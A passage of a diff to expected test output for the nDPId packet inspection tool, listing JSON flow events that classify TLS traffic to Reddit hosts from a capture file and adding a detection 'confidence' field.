CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
-01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01249{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01275{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01274{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01275{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
+01275{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":508,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01275{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkPzEPbiYGyoBJXgE4hAAACBAV4AQMDAwQCCArC1zjcqXTmGA=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291686129,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDvdaN0mUbYB0oBJXgO0tAAACBAV4AQMDAwQCCArC1zjbqXTmGA=="}
-00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbK5D8xEgBAB+9IFAAABAQgKqXTmRcLXONw="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291686129,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHT3WjdKgBAB+3ESAAABAQgKqXTmRcLXONs="}
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
